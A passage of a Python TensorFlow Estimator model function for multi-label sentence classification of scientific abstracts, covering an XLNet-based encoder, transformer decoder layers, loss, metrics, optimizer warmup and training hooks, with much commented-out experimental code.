embeddings_constraint=None,\n mask_zero=False,\n input_length=None\n )(inputs=year)\n # year_features shape=(batch_size, 1, 768), dtype=float32\n attend_to = year_features\n attend_to_mask = None\n else:\n attend_to = abstract_features\n attend_to_mask = word_padding_mask\n\n # with tf.variable_scope('input'):\n # catagorical_input = tf.concat(values=[year_features, authors_features, categories_features, fields_features], axis=1)\n # # catagorical_length = tf.shape(catagorical_input)[1]\n # catagorical_input = tf.keras.layers.LayerNormalization(\n # axis=-1,\n # epsilon=0.001,\n # center=True,\n # scale=True,\n # beta_initializer='zeros',\n # gamma_initializer='ones',\n # beta_regularizer=None,\n # gamma_regularizer=None,\n # beta_constraint=None,\n # gamma_constraint=None,\n # trainable=True,\n # name=None\n # )(inputs=catagorical_input)\n # catagorical_input = tf.keras.layers.Dropout(\n # rate=params.embedded_dropout, # 0.2\n # noise_shape=None,\n # seed=None,\n # )(inputs=catagorical_input, training=is_train)\n # if params.attend_to == 'title':\n # attend_to = title_features\n # attend_to_mask = title_padding_mask\n\n # bidirectional rnn\n with tf.variable_scope('word_decoder'):\n outputs = abstract_features\n # if params.use_transformer_positional_encoding:\n # outputs += positional_encoding(max_sentences, params.sent_transformer_d_model)[:, :sentence_maxlen, :]\n for i in range(params.word_num_layers):\n outputs = DecoderLayer(\n d_model=params.word_d_model,\n num_heads=int(params.word_d_model / 64),\n dff=int(params.word_d_model * params.word_dff_x),\n rate=params.word_dropout_rate\n )(\n training=is_train,\n inputs=outputs,\n inputs_mask=word_padding_mask,\n # attend_to=catagorical_input,\n # 
attend_to_mask=None\n attend_to=attend_to,\n attend_to_mask=attend_to_mask\n )\n # (batch_size, input_seq_len, d_model)\n # outputs = DecoderLayer5v4(\n # d_model=params.word_d_model,\n # num_heads=int(params.word_d_model / 64),\n # dff=int(params.word_d_model * params.word_dff_x),\n # rate=params.word_dropout_rate\n # )(\n # training=is_train,\n # inputs=outputs,\n # inputs_mask=word_padding_mask,\n # title=title_features,\n # title_mask=title_padding_mask,\n # authors=authors_features,\n # authors_mask=authors_padding_mask,\n # categories=categories_features,\n # categories_mask=categories_padding_mask,\n # fields=fields_features,\n # fields_mask=fields_padding_mask,\n # year=year_features,\n # year_mask=None\n # )\n # (batch_size, input_seq_len, d_model)\n\n with tf.variable_scope('sentence_pooling'):\n word_outputs = outputs\n sentence_inputs = tf.reshape(\n tensor=tf.map_fn(\n lambda i: tf.concat(\n [\n tf.slice(\n [\n tf.nn.relu(tf.reduce_max(s, axis=0))\n for s in tf.dynamic_partition(\n data=tf.slice(\n outputs[i], [0, 0],\n [lengths[i],\n tf.shape(outputs)[-1]]\n ),\n partitions=tf.\n slice(segment_ids[i], [0], [lengths[i]]),\n num_partitions=max_sentences\n )\n ], [0, 0],\n [sentence_maxlen,\n tf.shape(outputs)[-1]]\n )\n ],\n axis=1\n ), tf.range(batch_size), tf.float32\n ),\n shape=[batch_size, sentence_maxlen, outputs.shape[-1]]\n )\n\n # bidirectional rnn\n with tf.variable_scope('sent_decoder'):\n outputs = sentence_inputs\n if params.sent_num_layers > 0 and params.use_transformer_positional_encoding:\n outputs += positional_encoding(max_sentences, params.sent_d_model\n )[:, :sentence_maxlen, :]\n for i in range(params.sent_num_layers):\n outputs = DecoderLayer(\n d_model=params.sent_d_model,\n num_heads=int(params.sent_d_model / 64),\n dff=int(params.sent_d_model * params.sent_dff_x),\n rate=params.sent_dropout_rate\n )(\n training=is_train,\n inputs=outputs,\n inputs_mask=sent_padding_mask,\n # attend_to=catagorical_input,\n # attend_to_mask=None\n attend_to=attend_to,\n attend_to_mask=attend_to_mask\n )\n # (batch_size, input_seq_len, d_model)\n # outputs = DecoderLayer5v4(\n # d_model=params.sent_d_model,\n # num_heads=int(params.sent_d_model / 64),\n # dff=int(params.sent_d_model * params.sent_dff_x),\n # rate=params.sent_dropout_rate\n # )(\n # training=is_train,\n # inputs=outputs,\n # inputs_mask=sent_padding_mask,\n # title=title_features,\n # title_mask=title_padding_mask,\n # authors=authors_features,\n # authors_mask=authors_padding_mask,\n # categories=categories_features,\n # categories_mask=categories_padding_mask,\n # fields=fields_features,\n # fields_mask=fields_padding_mask,\n # year=year_features,\n # year_mask=None\n # )\n # (batch_size, input_seq_len, d_model)\n\n # dense layer\n with tf.variable_scope('sentence_dense'):\n if params.sent_dense_units[0] != None:\n for i, units in enumerate(params.sent_dense_units): # [256,128,64]\n with tf.variable_scope(f'dense_{i}_{units}'):\n outputs = tf.keras.layers.Dense(\n units=units,\n activation=gelu,\n use_bias=True,\n kernel_initializer=tf.truncated_normal_initializer(\n stddev=0.02\n ),\n bias_initializer='zeros',\n kernel_regularizer=None,\n bias_regularizer=None,\n activity_regularizer=None,\n kernel_constraint=None,\n bias_constraint=None\n )(inputs=outputs)\n outputs = tf.keras.layers.Dropout(\n rate=params.dense_dropout, # 0.2\n noise_shape=None,\n seed=None,\n )(inputs=outputs, training=is_train)\n # logits shape=(batch_size, sequence_length, num_classes), dtype=float32\n \n # with 
tf.variable_scope('article_dense'):\n # article_outputs = abstract_pooled\n # if params.arti_dense_units[0] != None:\n # for i, units in enumerate(params.arti_dense_units): # [256,128,64]\n # with tf.variable_scope(f'dense_{i}_{units}'):\n # article_outputs = tf.keras.layers.Dense(\n # units=units,\n # activation=gelu,\n # use_bias=True,\n # kernel_initializer=tf.truncated_normal_initializer(\n # stddev=0.02\n # ),\n # bias_initializer='zeros',\n # kernel_regularizer=None,\n # bias_regularizer=None,\n # activity_regularizer=None,\n # kernel_constraint=None,\n # bias_constraint=None\n # )(inputs=article_outputs)\n # article_outputs = tf.keras.layers.Dropout(\n # rate=params.dense_dropout, # 0.2\n # noise_shape=None,\n # seed=None,\n # )(inputs=article_outputs, training=is_train)\n # # logits shape=(batch_size, sequence_length, num_classes), dtype=float32\n\n # output layer\n with tf.variable_scope('output'):\n logits = tf.layers.dense(\n inputs=outputs,\n units=6,\n activation=None,\n use_bias=True,\n kernel_initializer=tf.truncated_normal_initializer(stddev=0.02),\n bias_initializer=tf.zeros_initializer(dtype=float_type),\n kernel_regularizer=None,\n bias_regularizer=None,\n activity_regularizer=None,\n kernel_constraint=None,\n bias_constraint=None,\n trainable=True,\n name='dense',\n reuse=None\n )\n # logits shape=(batch_size, sequence_length, num_classes), dtype=float32\n # with tf.variable_scope('article_output'):\n # article_logits = tf.layers.dense(\n # inputs=article_outputs,\n # units=4,\n # activation=None,\n # use_bias=True,\n # kernel_initializer=tf.truncated_normal_initializer(stddev=0.02),\n # bias_initializer=tf.zeros_initializer(dtype=float_type),\n # kernel_regularizer=None,\n # bias_regularizer=None,\n # activity_regularizer=None,\n # kernel_constraint=None,\n # bias_constraint=None,\n # trainable=True,\n # name='dense',\n # reuse=None\n # )\n # # article_logits shape=(batch_size, 4), dtype=float32\n\n # loss\n if mode != tf.estimator.ModeKeys.PREDICT:\n with tf.variable_scope('loss'):\n losses = tf.nn.weighted_cross_entropy_with_logits(\n labels=tf.cast(\n tf.nn.embedding_lookup(\n task1_embeddings, sentence_labels\n ), tf.float32\n ) * params.scale_label + (1 - params.scale_label) / 2.0,\n logits=tf.cast(logits, tf.float32),\n pos_weight=params.loss_pos_weight\n )\n masked_losses = losses * all_probs_mask\n # losses shape=(batch_size, sequence_length, 6), dtype=float32\n # average across batch_size and sequence_length\n loss = tf.reduce_sum(masked_losses) / \\\n tf.cast(tf.reduce_sum(sentence_sequence_lengths), dtype=tf.float32)\n # # tf.summary.scalar('loss', loss)\n # with tf.variable_scope('article_loss'):\n # article_losses = tf.nn.weighted_cross_entropy_with_logits(\n # labels=tf.cast(\n # tf.nn.embedding_lookup(\n # task2_embeddings, article_labels\n # ), tf.float32\n # ) * params.scale_label + (1 - params.scale_label) / 2.0,\n # logits=tf.cast(article_logits, tf.float32),\n # pos_weight=params.article_loss_pos_weight\n # )\n # loss += tf.reduce_sum(article_losses) / tf.cast(batch_size, dtype=tf.float32)\n\n # predictions\n #\n with tf.variable_scope('predictions'):\n predictions = {}\n all_probs = tf.sigmoid(x=logits, name='sigmoid') * all_probs_mask\n # all_probs shape=(batch_size, target_output_lengths, 6), dtype=float32\n predicted_sentence_class_scores = tf.RaggedTensor.from_tensor(\n all_probs, lengths=sentence_sequence_lengths, ragged_rank=1\n ).flat_values\n # predicted_sentence_class_scores shape=(number_sentences_in_batch, 6), dtype=float32\n 
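# NOTE: RaggedTensor.from_tensor(..., lengths=sentence_sequence_lengths).flat_values\n # drops the padded sentence slots, leaving one row per real sentence; e.g. with\n # lengths=[2, 1] a (2, 3, 6) score tensor flattens to shape (3, 6), which is why\n # the exported rows line up with the sample-submission order in the predict job.\n 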
predictions['predicted_sentence_class_scores'] = predicted_sentence_class_scores\n predicted_sentence_classes = tf.cast(\n predicted_sentence_class_scores > params.predict_threshold,\n tf.int32\n )\n predictions['predicted_sentence_classes'] = predicted_sentence_classes\n # predicted_article_class_scores = tf.sigmoid(x=article_logits, name='sigmoid')\n # predictions['predicted_article_class_scores'] = predicted_article_class_scores\n # predicted_article_classes = tf.cast(\n # predicted_article_class_scores > params.article_predict_threshold,\n # tf.int32\n # )\n # predictions['predicted_article_classes'] = predicted_article_classes\n \n # default saver is added in estimator._train_with_estimator_spec\n # training.Saver(\n # sharded=True,\n # max_to_keep=self._config.keep_checkpoint_max,\n # keep_checkpoint_every_n_hours=(\n # self._config.keep_checkpoint_every_n_hours),\n # defer_build=True,\n # save_relative_paths=True)\n scaffold = tf.train.Scaffold(\n saver=tf.train.Saver(\n sharded=False,\n max_to_keep=config.keep_checkpoint_max,\n keep_checkpoint_every_n_hours=(\n config.keep_checkpoint_every_n_hours\n ),\n defer_build=True,\n save_relative_paths=True\n )\n )\n\n if mode == tf.estimator.ModeKeys.PREDICT:\n return tf.estimator.EstimatorSpec(\n mode=mode,\n predictions=predictions, # PREDICT\n export_outputs={ # DEFAULT_SERVING_SIGNATURE_DEF_KEY = \"serving_default\"\n # tf.saved_model.DEFAULT_SERVING_SIGNATURE_DEF_KEY: tf.estimator.export.PredictOutput(predictions)\n },\n scaffold=scaffold,\n prediction_hooks=None\n )\n\n with tf.variable_scope(\n 'batch_metrics', values=[sentence_classes, predicted_sentence_classes]\n ):\n # with tf.control_dependencies([print_op]):\n is_correct = tf.cast(\n tf.equal(sentence_classes, predicted_sentence_classes), tf.float32\n )\n num_values = tf.ones_like(is_correct)\n batch_accuracy = tf.math.divide(\n tf.reduce_sum(is_correct), tf.reduce_sum(num_values)\n )\n TP = tf.cast(\n tf.count_nonzero(predicted_sentence_classes * sentence_classes),\n tf.float32\n )\n FP = tf.cast(\n tf.count_nonzero(\n predicted_sentence_classes * (sentence_classes - 1)\n ), tf.float32\n )\n FN = tf.cast(\n tf.count_nonzero(\n (predicted_sentence_classes - 1) * sentence_classes\n ), tf.float32\n )\n batch_precision = tf.math.divide_no_nan(TP, (TP + FP))\n batch_recall = tf.math.divide_no_nan(TP, (TP + FN))\n batch_f1 = tf.math.divide_no_nan(\n 2 * batch_precision * batch_recall,\n (batch_precision + batch_recall)\n )\n tf.summary.scalar('batch_accuracy', batch_accuracy)\n tf.summary.scalar('batch_precision', batch_precision)\n tf.summary.scalar('batch_recall', batch_recall)\n tf.summary.scalar('batch_f1', batch_f1)\n\n # with tf.variable_scope(\n # 'batch_metrics_article', values=[article_classes, predicted_article_classes]\n # ):\n # # with tf.control_dependencies([print_op]):\n # is_correct_article = tf.cast(\n # tf.equal(article_classes, predicted_article_classes), tf.float32\n # )\n # num_values_article = tf.ones_like(is_correct_article)\n # batch_accuracy_article = tf.math.divide(\n # tf.reduce_sum(is_correct_article), tf.reduce_sum(num_values_article)\n # )\n # TP_article = tf.cast(\n # tf.count_nonzero(predicted_article_classes * article_classes),\n # tf.float32\n # )\n # FP_article = tf.cast(\n # tf.count_nonzero(\n # predicted_article_classes * (article_classes - 1)\n # ), tf.float32\n # )\n # FN_article = tf.cast(\n # tf.count_nonzero(\n # (predicted_article_classes - 1) * article_classes\n # ), tf.float32\n # )\n # batch_precision_article = 
tf.math.divide_no_nan(TP_article, (TP_article + FP_article))\n # batch_recall_article = tf.math.divide_no_nan(TP_article, (TP_article + FN_article))\n # batch_f1_article = tf.math.divide_no_nan(\n # 2 * batch_precision_article * batch_recall_article,\n # (batch_precision_article + batch_recall_article)\n # )\n # tf.summary.scalar('batch_accuracy_article', batch_accuracy_article)\n # tf.summary.scalar('batch_precision_article', batch_precision_article)\n # tf.summary.scalar('batch_recall_article', batch_recall_article)\n # tf.summary.scalar('batch_f1_article', batch_f1_article)\n\n if mode == tf.estimator.ModeKeys.EVAL:\n\n def metric_fn(labels, predictions, scores):\n metrics = {\n 'auc': tf.metrics.auc(\n labels=labels,\n predictions=scores,\n ),\n 'f1_score': tf.contrib.metrics.f1_score(\n labels=labels,\n predictions=scores,\n ),\n 'f1_class': tf.contrib.metrics.f1_score(\n labels=labels,\n predictions=predictions,\n ),\n 'precision': tf.metrics.precision(\n labels=labels,\n predictions=predictions,\n ),\n 'recall': tf.metrics.recall(\n labels=labels,\n predictions=predictions,\n )\n # 'auc_article': tf.metrics.auc(\n # labels=labels_article,\n # predictions=scores_article,\n # ),\n # 'f1_score_article': tf.contrib.metrics.f1_score(\n # labels=labels_article,\n # predictions=scores_article,\n # ),\n # 'f1_class_article': tf.contrib.metrics.f1_score(\n # labels=labels_article,\n # predictions=predictions_article,\n # ),\n # 'precision_article': tf.metrics.precision(\n # labels=labels_article,\n # predictions=predictions_article,\n # ),\n # 'recall_article': tf.metrics.recall(\n # labels=labels_article,\n # predictions=predictions_article,\n # )\n }\n if params.eval_precision_recall_at_equal_thresholds == True:\n metrics['precision_recall_at_equal_thresholds'] = tf.contrib.metrics.precision_recall_at_equal_thresholds(\n labels=tf.cast(labels, tf.bool),\n predictions=scores,\n weights=None,\n num_thresholds=1001,\n use_locking=True\n )\n # metrics['precision_recall_at_equal_thresholds_article'] = tf.contrib.metrics.precision_recall_at_equal_thresholds(\n # labels=tf.cast(labels_article, tf.bool),\n # predictions=scores_article,\n # weights=None,\n # num_thresholds=1001,\n # use_locking=True\n # )\n return metrics\n\n eval_metric_ops = metric_fn(\n sentence_classes, predicted_sentence_classes,\n predicted_sentence_class_scores\n # article_classes, predicted_article_classes,\n # predicted_article_class_scores\n )\n\n return tf.estimator.EstimatorSpec(\n mode=mode,\n loss=loss, # EVAL, TRAIN\n eval_metric_ops=eval_metric_ops, # EVAL\n scaffold=scaffold,\n evaluation_hooks=None\n )\n\n # optimizer list\n optimizers = {\n 'adagrad':\n tf.train.AdagradOptimizer,\n 'adam':\n lambda lr: tf.train.AdamOptimizer(lr, epsilon=params.adam_epsilon),\n # lambda lr: tf.train.AdamOptimizer(lr, epsilon=1e-08),\n 'nadam':\n lambda lr: tf.contrib.opt.\n NadamOptimizer(lr, epsilon=params.adam_epsilon),\n 'ftrl':\n tf.train.FtrlOptimizer,\n 'momentum':\n lambda lr: tf.train.MomentumOptimizer(lr, momentum=0.9),\n 'rmsprop':\n tf.train.RMSPropOptimizer,\n 'sgd':\n tf.train.GradientDescentOptimizer,\n }\n\n # optimizer\n with tf.variable_scope('optimizer'):\n # clip_gradients = params.gradient_clipping_norm\n clip_gradients = adaptive_clipping_fn(\n std_factor=params.clip_gradients_std_factor, # 2.\n decay=params.clip_gradients_decay, # 0.95\n static_max_norm=params.clip_gradients_static_max_norm, # 6.\n global_step=global_step,\n report_summary=True,\n epsilon=np.float32(1e-7),\n name=None\n )\n\n def 
learning_rate_warmup(\n global_step,\n warmup_steps,\n repeat_steps=0,\n start=0.01,\n warmup_schedule='exp'\n ):\n \"\"\"Learning rate warmup multiplier.\"\"\"\n local_step = global_step\n if repeat_steps > 0:\n local_step = global_step % repeat_steps\n if not warmup_steps:\n return tf.constant(1.)\n\n tf.logging.info(\n 'Applying %s learning rate warmup for %d steps',\n warmup_schedule, warmup_steps\n )\n\n local_step = tf.cast(local_step, dtype=tf.float32)\n warmup_steps = tf.cast(warmup_steps, dtype=tf.float32)\n start = tf.cast(start, dtype=tf.float32)\n warmup = tf.constant(1.)\n if warmup_schedule == 'exp':\n warmup = tf.exp(tf.log(start) / warmup_steps\n )**(warmup_steps - local_step)\n else:\n assert warmup_schedule == 'linear'\n warmup = (\n (tf.constant(1.) - start) / warmup_steps\n ) * local_step + start\n return tf.where(local_step < warmup_steps, warmup, tf.constant(1.))\n\n decay = params.learning_rate_decay_fn.lower()\n lr_schedule = 1.0 # if not decay or decay == 'none':\n if decay == 'noisy_linear_cosine_decay':\n lr = tf.train.noisy_linear_cosine_decay(\n params.learning_rate,\n global_step,\n decay_steps=params.learning_rate_decay_steps, # 27000000\n initial_variance=1.0,\n variance_decay=0.55,\n num_periods=0.5,\n alpha=0.0,\n beta=0.001,\n name=None\n )\n elif decay == 'exponential_decay':\n schedule = tf.keras.optimizers.schedules.ExponentialDecay(\n initial_learning_rate=1.0,\n decay_steps=params.learning_rate_decay_steps, # 27000000\n decay_rate=params.learning_rate_decay_rate, # 0.95\n staircase=False,\n name=None\n )\n lr_schedule *= schedule(tf.math.maximum(global_step - params.warmup_steps, 0))\n if params.warmup_steps > 0:\n lr_warmup = learning_rate_warmup(\n global_step,\n warmup_steps=params.warmup_steps, # 35000\n repeat_steps=params.warmup_repeat_steps, # 0\n start=params.warmup_start_lr, # 0.001,\n warmup_schedule=params.warmup_schedule, # 'exp'\n )\n if params.layer_warmup_steps > 0:\n layer_warmup = learning_rate_warmup(\n global_step,\n warmup_steps=params.layer_warmup_steps, # 35000\n repeat_steps=params.warmup_repeat_steps, # 0\n start=params.warmup_start_lr, # 0.001,\n warmup_schedule=params.warmup_schedule, # 'exp'\n )\n # Add learning rate to summary\n lr = params.learning_rate * lr_warmup * lr_schedule\n tf.summary.scalar('learning_rate', lr)\n tf.summary.scalar('layer_schedule', layer_warmup * lr_schedule)\n tf.summary.scalar('lr_schedule', lr_warmup * lr_schedule)\n if params.optimizer == 'bertadam':\n optimizer = AdamWeightDecayOptimizer(\n learning_rate=lr,\n weight_decay_rate=0.01 * lr_warmup * lr_schedule,\n beta_1=0.9,\n beta_2=0.999,\n epsilon=1e-6,\n exclude_from_weight_decay=[\"LayerNorm\", \"layer_norm\", \"/bias\"]\n )\n if params.use_fp16:\n optimizer = tf.train.experimental.enable_mixed_precision_graph_rewrite(optimizer)\n \n # 0 abstract/model/transformer/r_w_bias:0' shape=(24, 16, 64)\n # 1 abstract/model/transformer/r_r_bias:0' shape=(24, 16, 64)\n # 2 abstract/model/transformer/word_embedding/lookup_table:0' shape=(32000, 1024)\n # 3 abstract/model/transformer/r_s_bias:0' shape=(24, 16, 64)\n # 4 abstract/model/transformer/seg_embed:0' shape=(24, 2, 16, 64)\n # 5 abstract/model/transformer/layer_0/rel_attn/q/kernel:0' shape=(1024, 16, 64)\n # 6 abstract/model/transformer/layer_0/rel_attn/k/kernel:0' shape=(1024, 16, 64)\n # 7 abstract/model/transformer/layer_0/rel_attn/v/kernel:0' shape=(1024, 16, 64)\n # 8 abstract/model/transformer/layer_0/rel_attn/r/kernel:0' shape=(1024, 16, 64)\n # 9 
abstract/model/transformer/layer_0/rel_attn/o/kernel:0' shape=(1024, 16, 64)\n tvars = tf.trainable_variables()\n if params.train_seg_embed:\n tvars = tvars[4:5] + tvars[5 + params.freeze_layers * 13:]\n else:\n tvars = tvars[5 + params.freeze_layers * 13:]\n grads_and_vars = optimizer.compute_gradients(loss, tvars)\n grads_and_vars = [(g,v) for g,v in grads_and_vars if g is not None]\n grads, tvars = list(zip(*grads_and_vars))\n for i in range(7):\n print(i, '=======', tvars[i], '======')\n # This is how the model was pre-trained.\n (grads, _) = tf.clip_by_global_norm(grads, clip_norm=1.0)\n\n if params.layer_decay_rate != 1.0:\n n_layer = xlnet_config.n_layer\n for i in range(len(grads)):\n for l in range(n_layer):\n prefix = f'abstract/model/transformer/layer_{l}/'\n if tvars[i].name[:len(prefix)] == prefix:\n abs_rate = params.layer_decay_rate ** (n_layer - 1 - l)\n grads[i] *= abs_rate * layer_warmup\n # tf.logging.info(\"Apply mult {:.4f} to layer-{} grad of {}\".format(rate, l, tvars[i].name))\n break\n \n train_op = optimizer.apply_gradients(\n zip(grads, tvars), global_step=global_step\n )\n # Normally the global step update is done inside of `apply_gradients`.\n # However, `AdamWeightDecayOptimizer` doesn't do this. But if you use\n # a different optimizer, you should probably take this line out.\n new_global_step = global_step + 1\n train_op = tf.group(train_op, [global_step.assign(new_global_step)])\n else:\n # update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n # with tf.control_dependencies(update_ops):\n train_op = tf.contrib.layers.optimize_loss(\n loss=loss,\n global_step=global_step,\n learning_rate=lr, # 0.001\n optimizer=optimizers[params.optimizer.lower()],\n gradient_noise_scale=None,\n gradient_multipliers=None,\n # some gradient clipping stabilizes training in the beginning.\n # clip_gradients=clip_gradients,\n # clip_gradients=6.,\n # clip_gradients=None,\n # learning_rate_decay_fn=learning_rate_decay_fn,\n update_ops=None,\n variables=None,\n name=None,\n summaries=[\n # 'gradients',\n # 'gradient_norm',\n 'loss',\n # 'learning_rate' # only added if learning_rate_decay_fn is not None\n ],\n colocate_gradients_with_ops=True,\n increment_global_step=True\n )\n\n group_inputs = [train_op]\n\n # runtime numerical checks\n if params.check_nans:\n checks = tf.add_check_numerics_ops()\n group_inputs = [checks]\n\n # update accuracy\n # group_inputs.append(metrics['accuracy'][1])\n\n # record total number of examples processed\n examples_processed = tf.get_variable(\n name='examples_processed',\n initializer=tf.cast(0, tf.int64),\n trainable=False,\n dtype=tf.int64,\n aggregation=tf.VariableAggregation.SUM\n )\n # print('examples_processed', examples_processed)\n group_inputs.append(\n tf.assign_add(\n examples_processed,\n tf.cast(batch_size, tf.int64),\n name='update_examples_processed'\n )\n )\n epoch = examples_processed // seq_total\n group_inputs.append(epoch)\n progress = examples_processed / seq_total - tf.cast(epoch, tf.float64)\n group_inputs.append(progress)\n\n train_op = tf.group(*group_inputs)\n\n # if params.debug:\n # train_op = tf.cond(\n # pred=tf.logical_or(\n # tf.is_nan(tf.reduce_max(embeddings)),\n # tf.equal(global_step, 193000)\n # ),\n # false_fn=lambda: train_op,\n # true_fn=lambda: tf.Print(\n # train_op,\n # # data=[global_step, metrics['accuracy'][0], lengths, loss, losses, predictions['classes'], labels, mask, protein, embeddings],\n # data=[global_step, batch_accuracy, lengths, loss, embeddings],\n # message='## DEBUG LOSS: ',\n # 
summarize=50000\n # )\n # )\n\n training_hooks = []\n # INFO:tensorflow:global_step/sec: 2.07549\n training_hooks.append(\n tf.train.StepCounterHook(\n output_dir=params.model_dir,\n every_n_steps=params.log_step_count_steps\n )\n )\n\n # INFO:tensorflow:accuracy = 0.16705106, examples = 15000, loss = 9.688441, step = 150 (24.091 sec)\n def logging_formatter(v):\n return 'TP:\\033[1;32m {:5.0f}\\033[0m, precision:\\033[1;32m {:9.5%}\\033[0m, recall:\\033[1;32m {:9.5%}\\033[0m, f1:\\033[1;32m {:9.5%}\\033[0m, accuracy:\\033[1;32m {:9.5%}\\033[0m, loss:\\033[1;32m {:8.5f}\\033[0m, lr:\\033[1;32m {:8.5f}\\033[0m, step:\\033[1;32m {:7,d}\\033[0m'.format(\n v['TP'], v['precision'], v['recall'], v['f1'], v['accuracy'],\n v['loss'], v['learning_rate'], v['step']\n )\n\n tensors = {\n 'TP': TP,\n 'precision': batch_precision,\n 'recall': batch_recall,\n 'f1': batch_f1,\n 'accuracy': batch_accuracy,\n 'loss': loss,\n 'step': global_step,\n 'learning_rate': lr\n # 'input_size': tf.shape(protein),\n # 'examples': examples_processed\n }\n # def logging_formatter(v):\n # return 'TP:\\033[1;32m {:5.0f}\\033[0m, precision:\\033[1;32m {:6.2%}/{:6.2%}\\033[0m, recall:\\033[1;32m {:6.2%}/{:6.2%}\\033[0m, f1:\\033[1;32m {:6.2%}/{:6.2%}\\033[0m, accuracy:\\033[1;32m {:6.2%}/{:6.2%}\\033[0m, loss:\\033[1;32m {:8.5f}\\033[0m, lr:\\033[1;32m {:10.8f}\\033[0m, step:\\033[1;32m {:6,d}\\033[0m'.format(\n # v['TP'], v['precision'], v['precision_article'], v['recall'], v['recall_article'], v['f1'], v['f1_article'], v['accuracy'], v['accuracy_article'],\n # v['loss'], v['learning_rate'], v['step']\n # )\n \n # tensors = {\n # 'TP': TP,\n # 'precision': batch_precision,\n # 'recall': batch_recall,\n # 'f1': batch_f1,\n # 'accuracy': batch_accuracy,\n # 'precision_article': batch_precision_article,\n # 'recall_article': batch_recall_article,\n # 'f1_article': batch_f1_article,\n # 'accuracy_article': batch_accuracy_article,\n # 'loss': loss,\n # 'step': global_step,\n # 'learning_rate': lr\n # # 'input_size': tf.shape(protein),\n # # 'examples': examples_processed\n # }\n # if is_train:\n # tensors['epoch'] = epoch\n # tensors['progress'] = progress\n\n training_hooks.append(\n ColoredLoggingTensorHook(\n tensors=tensors,\n every_n_iter=params.log_step_count_steps,\n at_end=False,\n formatter=logging_formatter\n )\n )\n training_hooks.append(\n EpochProgressBarHook(\n total=seq_total,\n initial_tensor=examples_processed,\n n_tensor=batch_size,\n postfix_tensors=None,\n every_n_iter=params.log_step_count_steps\n )\n )\n if params.trace:\n training_hooks.append(\n tf.train.ProfilerHook(\n save_steps=params.save_summary_steps,\n output_dir=params.model_dir,\n show_dataflow=True,\n show_memory=True\n )\n )\n training_hooks.append(\n EpochCheckpointInputPipelineHook(\n checkpoint_dir=params.model_dir,\n config=config,\n save_secs=None, # 10m\n # save_secs=params.save_checkpoints_secs, # 10m\n save_steps=params.save_checkpoints_steps,\n # save_steps=None,\n )\n )\n\n training_chief_hooks = []\n # # saving_listeners like _NewCheckpointListenerForEvaluate\n # # will be called on the first CheckpointSaverHook\n # training_chief_hooks.append(tf.train.CheckpointSaverHook(\n # checkpoint_dir=params.model_dir,\n # # effectively only save on start and end of MonitoredTrainingSession\n # save_secs=30 * 24 * 60 * 60,\n # save_steps=None,\n # checkpoint_basename=\"model.epoch\",\n # saver=tf.train.Saver(\n # sharded=False,\n # max_to_keep=0,\n # defer_build=False,\n # save_relative_paths=True\n # )\n # ))\n # # Add a second 
CheckpointSaverHook to save every save_checkpoints_secs\n # training_chief_hooks.append(tf.train.CheckpointSaverHook(\n # checkpoint_dir=params.model_dir,\n # save_secs=params.save_checkpoints_secs, # 10m\n # save_steps=None,\n # checkpoint_basename=\"model.step\",\n # scaffold=scaffold\n # ))\n training_chief_hooks.append(\n EpochCheckpointSaverHook(\n checkpoint_dir=params.model_dir,\n epoch_tensor=epoch,\n save_secs=None, # 10m\n # save_secs=params.save_checkpoints_secs, # 10m\n save_steps=params.save_checkpoints_steps,\n # save_steps=None,\n scaffold=scaffold\n )\n )\n\n # local training:\n # all_hooks=[\n # EpochCheckpointSaverHook, Added into training_chief_hooks in this model_fn\n # SummarySaverHook, # Added into chief_hooks in MonitoredTrainingSession()\n # _DatasetInitializerHook, # Added into worker_hooks in Estimator._train_model_default\n # NanTensorHook, # Added into worker_hooks in Estimator._train_with_estimator_spec\n # StepCounterHook, # Added into training_hooks in this model_fn\n # LoggingTensorHook, # Added into training_hooks in this model_fn\n # EpochCheckpointInputPipelineHook # Added into training_hooks in this model_fn\n # ]\n\n return tf.estimator.EstimatorSpec(\n mode=mode,\n predictions=predictions, # PREDICT\n loss=loss, # EVAL, TRAIN\n train_op=train_op, # TRAIN\n scaffold=scaffold,\n training_chief_hooks=training_chief_hooks,\n training_hooks=training_hooks\n )\n\n\n# https://github.com/tensorflow/models/blob/69cf6fca2106c41946a3c395126bdd6994d36e6b/tutorials/rnn/quickdraw/train_model.py\n\n\ndef create_estimator_and_specs(run_config):\n \"\"\"Creates an Estimator, TrainSpec and EvalSpec.\"\"\"\n\n # build hyperparameters\n model_params = tf.contrib.training.HParams(\n command=FLAGS.command,\n model_dir=run_config.model_dir,\n model_dir_prefix=FLAGS.model_dir_prefix,\n tfrecord_pattern={\n tf.estimator.ModeKeys.TRAIN: FLAGS.training_data,\n tf.estimator.ModeKeys.EVAL: FLAGS.eval_data,\n tf.estimator.ModeKeys.PREDICT: FLAGS.predict_data\n },\n data_version=FLAGS.data_version,\n metadata_path=FLAGS.metadata_path,\n max_sentences=FLAGS.max_sentences,\n experiment_name=FLAGS.experiment_name,\n host_script_name=FLAGS.host_script_name,\n job=FLAGS.job,\n max_epochs=FLAGS.max_epochs,\n max_runs=FLAGS.max_runs,\n eval_predict_checkpoint=FLAGS.eval_predict_checkpoint,\n predict_prefix=FLAGS.predict_prefix,\n article_predict_prefix=FLAGS.article_predict_prefix,\n predict_sample_submission=FLAGS.predict_sample_submission,\n predict_sample_submission_article=FLAGS.predict_sample_submission_article,\n predict_threshold=FLAGS.predict_threshold,\n article_predict_threshold=FLAGS.article_predict_threshold,\n eval_dir=FLAGS.eval_dir,\n eval_prefix=FLAGS.eval_prefix,\n eval_format=FLAGS.eval_format,\n eval_level=FLAGS.eval_level,\n eval_precision_recall_at_equal_thresholds=FLAGS.\n eval_precision_recall_at_equal_thresholds,\n predict_top_k=FLAGS.predict_top_k,\n num_gpus=FLAGS.num_gpus,\n num_cpu_threads=FLAGS.num_cpu_threads,\n random_seed=FLAGS.random_seed,\n use_xla=FLAGS.use_xla,\n use_fp16=FLAGS.use_fp16,\n use_tensor_ops=FLAGS.use_tensor_ops,\n save_summary_steps=FLAGS.save_summary_steps,\n save_checkpoints_steps=FLAGS.save_checkpoints_steps,\n save_checkpoints_secs=FLAGS.save_checkpoints_secs,\n keep_checkpoint_max=FLAGS.keep_checkpoint_max,\n keep_checkpoint_every_n_hours=FLAGS.keep_checkpoint_every_n_hours,\n log_step_count_steps=FLAGS.log_step_count_steps,\n eval_delay_secs=FLAGS.eval_delay_secs,\n 